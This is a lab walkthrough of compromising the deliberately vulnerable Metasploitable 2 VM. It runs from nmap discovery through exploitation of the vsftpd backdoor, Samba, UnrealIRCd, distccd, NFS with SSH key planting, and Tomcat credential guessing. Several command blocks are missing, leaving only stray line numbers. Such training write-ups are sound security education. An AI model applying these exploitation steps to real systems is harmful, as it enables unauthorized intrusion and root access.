Metasploitable 2 is virtual machine based on Linux, which contains several vulnerabilities to exploit using
Metasploit framework as well other security tools.
- Used Netdiscover to identify the target IP of the remote machine.
- Used Nmap to Banner grabbed the services running on the open ports.
- Used Metasploit to exploit open ports and running services.
- Used Netcat for making a reverse shell.
- Metasploitable_2 [8825F2509A9B9A58EC66BD65EF83167F]
- Netdiscover [Can be found in Kali Linux]
- Nmap [Can be found in Kali Linux]
- Metasploit [Can be found in Kali Linux]
- Netcat [Can be found in Kali Linux]
As a initial stage we downloaded the vm and imported to VMware Workstation. After successful import, we started to do a discovery
of target ip by running the
root@Hacker:~# netdiscover -r 192.168.2.0/24
192.168.2.7 00:0c:29:fa:dd:2a 01 060 VMware, Inc.
After the discovery of target ip, we ran
Nmap to identify the open ports of the target ip. Which gave us
a huge list of port no along with their state (open|closed|filterd), service, and Version.
root@Hacker:~# nmap -sS -sV -p 1-10000 192.168.2.7
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-24 09:32 IST
Nmap scan report for 192.168.2.7
Host is up (0.00011s latency).
Not shown: 9974 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Later on, we started to exploit the ports one by one using
Metasploit. Before we started to exploit, we did a
google search on each version to identify whether we could be able to exploit them.
A Vulnerability Assessment can be done on the corresponding target ip to identify whether the running serives are vulnerable to exploit.
Vulnerability Assessment Tools:(1)Nessus (2)OpenVAS (3)ImmunityCanvas (4)Qualys
1.Gaining Shell via Metasploit
The Virtual machine was found to be running a
FTP service with version
vsftpd 2.3.4 which was vulnerable to a backdoor
command execution. We ran the metasploit
msfconsole in kali linux and made a search on vsftpd which gave us exploit module
for the backdoor command execution for the specific vsftpd 2.3.4
msf > search vsftpd
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
Finally we gained the shell with the help of metasploit vsftpd backdoor module.
2.Gaining shell via Netcat
We can also backdoor ftp by running up
Netcat (Reads and writes to TCP and UDP network connections) to gain a shell.
Initially run this command in separate terminal to make a connection to
21 via USER
anyname:) along with the smile
:) and PASS with
1 2 3 4 5 6 7
Then open up a new terminal without closing the above running terminal, type in the nc command show below. Where Port
6200 is a Backdoor port for the ftp
and -v mentions Verbose.
You can also do without
-v, it just print out messages on Standard Error, such as when a connection occurs.
root@Hacker:~# nc 192.168.2.7 6200 -v
192.168.2.7: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.7] 6200 (?) open
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.2.7 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:72642 errors:0 dropped:0 overruns:0 frame:0
TX packets:20426 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:77577863 (73.9 MB) TX bytes:1589401 (1.5 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1670 errors:0 dropped:0 overruns:0 frame:0
TX packets:1670 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:793069 (774.4 KB) TX bytes:793069 (774.4 KB)
Voila!!!Finally we also got a shell with the help of Netcat tool.
The current version of
samba server installed on the remote host is affected by a command execution vulerability,
where there is no needed of authentication to exploit this vulnerability. We kick started the metasploit, and we chose the below exploit module
which helped us to gain the Root access of the remote system.
Finally!!! We rooted into remote system using the samba exploit.
RMI Registry Exploit
After some break, we analyzed the nmap result along with some google results , we came to know that the remote
rmiregistry on port 1099 was found to be vulnerable. We exploited the same using metasploit
to gain root access to the remote system.
The remote system was running up with a service named
shell on port
1524, we made a
Netcat connection to the port and wow!
i was not prompted with any user name and password for entering. Directly i was able to access the root shell.
SSH through NFS
Network File system
[NFS] was found to be open on Port
2049 where RPC was also found to be open on port
111. So we made a
rpcinfo to identify NFS
showmount to identify the mountpoint to export a local file to remote system.
root@Hacker:~# rpcinfo -p 192.168.2.7
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 47286 status
100024 1 tcp 43411 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 58082 nlockmgr
100021 3 udp 58082 nlockmgr
100021 4 udp 58082 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 51154 nlockmgr
100021 3 tcp 51154 nlockmgr
100021 4 tcp 51154 nlockmgr
100005 1 udp 47566 mountd
100005 1 tcp 44007 mountd
100005 2 udp 47566 mountd
100005 2 tcp 44007 mountd
100005 3 udp 47566 mountd
100005 3 tcp 44007 mountd
Rpcinfo shows the NFS is open.
root@Hacker:~# showmount -e 192.168.2.7
Export list for 192.168.2.7:
using showmount -e we found that the “/” share (the root of the file system) is being exported.By making use of this share we started to access the system with a writeable filesystem.
Based on nmap result we found that
SSH service was running on port
22, So we started to generate a new SSH key on our attacking system,
Later we created a new directory for mounting to the NFS export and add our key to the root user account’s authorized_keys file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
The remote machine was running a UnreaIRCD IRC daemon. Later we found that this version contains a backdoor that can be triggered by sending the letters “AB” following by a system command to the server on any listening port.
Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
Backdoor by Nature
Distccd is a free distributed c/c++ compiler runs on port
3632, which was found to be vunerable for a backoor.
The problem with this service is that any user can easily abuse it to run a command of their choice to gain a interactive shell.
We achieved a interactive shell via the metasploit module, as shown below
Remote Code execution
drb service running on port
8787 was vulnerable to remote code execution. We exploited this vulnerability using the
metasploit module which is coded below
For a while we were exploiting the vulnerabilities only on network side, and we didnt even exploit any of the web services.
So we now decided do a web backoor and were looing for a suitable service to do so. By doing a quick scan through our human eyes into the nmap
results we found a
Apache tomcat service running on port
8180. The following page will appear if you browse this port with the
Take a look at the webpage, you could see a Administration column containing:1. status 2. Tomcat administration 3. Tomcat manager
we just made a click on one of the link, suddenly a Authentication page appears saying enter the
Password. when we got this
we thougt that we could not exploit the page. But its not the case, we decided to do a search in metasploit about tomcat to find any
modules for exploiting and we got a list of modules. Then we decided to run the specific auxiliary modules which would result you the
username and password of the tomcat administrator. The metasploit auxiliary module is shown below.
After a while the scan was complete and we got the username and passowrd for tomcat administration whihc is shown below
1 2 3 4 5 6
Now we could make use of this tomcat username and password to gain a interactive shell using the below metasploit module
Finaly we got out shell!!!!!.
Its Time to endup this Pentesting Roadmap of Metasploitable 2. Game Over Guys. Stay tuned each weekend i will get back with different VM’s with different ways of Getting the Flag.